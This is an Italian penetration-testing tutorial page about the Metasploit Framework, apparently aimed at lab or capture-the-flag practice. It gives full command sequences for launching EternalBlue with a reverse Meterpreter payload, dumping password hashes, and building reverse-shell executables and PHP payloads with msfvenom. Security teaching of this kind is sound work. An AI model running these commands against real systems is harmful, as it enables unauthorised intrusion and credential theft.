Home › Exploitation › Metasploit

Metasploit Framework

Fase 4: sfruttare le vulnerabilità. Metasploit è il framework che raccoglie migliaia di exploit pronti + il potente payload Meterpreter.

Teoria: i pezzi

  • Exploit: il codice che sfrutta una vulnerabilità specifica (es. EternalBlue su SMB).
  • Payload: cosa gira sul target dopo l'exploit (es. una reverse shell, o Meterpreter).
  • Meterpreter: payload avanzato in memoria; ti dà upload/download, screenshot, dump hash, pivoting.
  • Auxiliary: moduli di supporto (scanner, brute force, fuzzer).
  • listener / handler: la parte in ascolto sulla tua Kali che riceve la connessione.

Concetto chiave payload: bind (ti connetti tu al target) vs reverse (il target si connette a te — quasi sempre questo, buca i firewall in uscita).

Prima di Metasploit: searchsploit

Hai una versione da enumeration? Cerca exploit pubblici offline (Exploit-DB):

searchsploit apache 2.4.49
searchsploit -m 50383     # copia l'exploit numero 50383 nella cartella corrente

Il flusso in msfconsole

msfconsole                       # avvia il framework

search eternalblue              # cerca un modulo
use exploit/windows/smb/ms17_010_eternalblue
show options                     # quali parametri servono
set RHOSTS 10.10.123.45          # il target
set LHOST tun0                    # il TUO IP (interfaccia VPN)
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
check                            # (se supportato) verifica se è vulnerabile
exploit                          # lancia!

Se va a buon fine ottieni meterpreter >. Comandi utili:

sysinfo          # info sistema
getuid           # chi sono
shell            # shell di sistema classica
hashdump         # dump degli hash (se admin)
upload / download # trasferisci file
background       # metti la sessione in background

msfvenom — creare payload standalone

Per generare una reverse shell da caricare tu (es. via file upload):

# payload Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f elf -o shell.elf
# payload web PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f raw -o shell.php
# .exe per Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o shell.exe

Poi metti in ascolto l'handler in msfconsole:

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST tun0 ; set LPORT 4444 ; run
Sui tuoi libri: Metasploit – The Penetration Tester's Guide (Kennedy) — LA guida; Metasploit Penetration Testing Cookbook. Vedi Risorse.